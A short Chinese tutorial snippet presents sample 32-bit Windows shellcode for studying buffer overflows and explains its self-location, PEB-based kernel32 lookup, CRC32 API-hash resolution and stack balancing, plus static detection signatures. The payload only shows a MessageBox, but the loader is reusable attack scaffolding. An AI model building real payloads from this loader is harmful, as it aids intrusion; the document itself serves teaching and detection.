学习缓冲区溢出时会用到的示例 ShellCode(32 位 x86 Windows):
unsigned char ShellCode[] =
{
0xE8,0x00,0x00,0x00,0x00,0x5F,0x81,0xEF,
0x1E,0x10,0x40,0x00,0x8D,0x87,0x83,0x10,
0x40,0x00,0x50,0xE8,0x61,0x00,0x00,0x00,
0x33,0xC0,0x6A,0x00,0x8D,0x87,0x72,0x10,
0x40,0x00,0x50,0x8D,0x87,0x4D,0x10,0x40,
0x00,0x50,0x6A,0x00,0xFF,0x97,0x8A,0x10,
0x40,0x00,0x58,0xC3,0x5B,0x2A,0x5D,0x20,
0x48,0x65,0x6C,0x6C,0x6F,0x20,0x57,0x6F,
0x72,0x6C,0x64,0x20,0x43,0x6F,0x64,0x65,
0x72,0x21,0x20,0x28,0x43,0x29,0x20,0x41,
0x6E,0x73,0x6B,0x79,0x61,0x2E,0x0D,0x0A,
0x00,0x4D,0x73,0x67,0x42,0x6F,0x78,0x20,
0x42,0x79,0x20,0x41,0x6E,0x73,0x6B,0x79,
0x61,0x00,0x75,0x73,0x65,0x72,0x33,0x32,
0x00,0xF7,0x6C,0x55,0xD8,0x00,0x00,0x00,
0x00,0x60,0x8B,0x74,0x24,0x24,0xE8,0x97,
0x00,0x00,0x00,0x68,0xAD,0xD1,0x34,0x41,
0x50,0xE8,0x1F,0x00,0x00,0x00,0x56,0xFF,
0xD0,0x8B,0xD8,0x2B,0xC0,0xAC,0x84,0xC0,
0x75,0xFB,0x8B,0xFE,0xAD,0x85,0xC0,0x74,
0x0A,0x50,0x53,0xE8,0x05,0x00,0x00,0x00,
0xAB,0xEB,0xF1,0x61,0xC3,0x60,0x8B,0x5C,
0x24,0x24,0x8B,0x74,0x24,0x28,0x2B,0xED,
0x8B,0xD3,0x03,0x52,0x3C,0x8B,0x52,0x78,
0x03,0xD3,0x8B,0x42,0x18,0x8B,0x7A,0x1C,
0x03,0xFB,0x8B,0x7A,0x20,0x03,0xFB,0x52,
0x8B,0xD7,0x8B,0x17,0x03,0xD3,0x45,0x60,
0x8B,0xF2,0x2B,0xC9,0xAC,0x41,0x84,0xC0,
0x75,0xFA,0x89,0x4C,0x24,0x18,0x61,0x60,
0x2B,0xC0,0xE8,0x51,0x00,0x00,0x00,0x3B,
0xC6,0x61,0x74,0x08,0x83,0xC7,0x04,0x48,
0x74,0x18,0xEB,0xD6,0x5A,0x4D,0x8B,0x4A,
0x24,0x03,0xCB,0x0F,0xB7,0x04,0x69,0x8B,
0x6A,0x1C,0x03,0xEB,0x8B,0x44,0x85,0x00,
0x03,0xC3,0x89,0x44,0x24,0x1C,0x61,0xC2,
0x08,0x00,0x60,0x2B,0xC0,0x64,0x8B,0x40,
0x30,0x85,0xC0,0x78,0x0C,0x8B,0x40,0x0C,
0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,
0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,
0x40,0x3C,0x89,0x44,0x24,0x1C,0x61,0xC3,
0x60,0xE3,0x18,0xF7,0xD0,0x32,0x02,0x42,
0xB3,0x08,0xD1,0xE8,0x73,0x05,0x35,0x20,
0x83,0xB8,0xED,0xFE,0xCB,0x75,0xF3,0xE2,
0xEC,0xF7,0xD0,0x89,0x44,0x24,0x1C,0x61,
0xC3
};
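这段代码的功能只是弹出一个 MessageBox,实现上分四步:
1.代码自定位(call/pop 取得自身运行地址)
2.获取 kernel32.dll 基址(通过 fs:[30h] 处的 PEB 读取已加载模块链表)
3.动态搜索需要使用的API(遍历导出表,按函数名的 CRC32 值比较)
4.平衡堆栈(返回前弹出多余的参数,并用 pushad/popad 保存和恢复寄存器)
分析此类代码时,call $+5、对 fs:[30h] 的访问以及常量 0xEDB88320 都是常见的静态识别特征。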